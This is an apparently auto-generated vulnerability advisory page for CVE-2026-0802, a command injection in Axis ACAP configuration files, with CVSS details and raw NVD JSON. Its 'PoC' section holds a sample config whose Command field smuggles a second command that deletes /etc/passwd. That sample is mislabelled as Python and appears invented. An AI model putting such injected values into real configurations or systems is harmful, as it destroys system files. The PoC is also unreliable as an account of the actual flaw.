Security Vulnerability Report
中文
CVE-2026-0802 CVSS 6.0 MEDIUM

CVE-2026-0802

Published: 2026-05-12 07:16:09
Last Modified: 2026-05-12 14:13:04

Description

An ACAP configuration file lacked sufficient input validation, which could allow command injection and potentially lead to privilege escalation. This vulnerability can only be exploited if the Axis device is configured to allow the installation of unsigned ACAP applications, and if an attacker convinces the victim to install a malicious ACAP application.

CVSS Details

CVSS Score
6.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

未明确指定(请参考Axis官方公告CVE-2026-0802pdf)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Malicious ACAP configuration file example (e.g., package.conf) # This PoC demonstrates how a malicious parameter could be crafted to achieve command injection. [Package] Name=LegitimateLookingApp Version=1.0.0 [Execution] # The vulnerable field 'Command' lacks input validation. # An attacker appends a shell command separator (;) followed by the malicious payload. Command=/usr/bin/start_app.sh ; rm -f /etc/passwd ; echo "System Compromised" [Permissions] AllowRoot=true

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0802", "sourceIdentifier": "[email protected]", "published": "2026-05-12T07:16:09.460", "lastModified": "2026-05-12T14:13:03.510", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An ACAP configuration file lacked sufficient input validation, which could allow command injection and potentially lead to privilege escalation. This vulnerability can only be exploited if the Axis device is configured to allow the installation of unsigned ACAP applications, and if an attacker convinces the victim to install a malicious ACAP application."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1287"}]}], "references": [{"url": "https://www.axis.com/dam/public/67/b8/75/cve-2026-0802pdf-en-US-530731.pdf", "source": "[email protected]"}]}}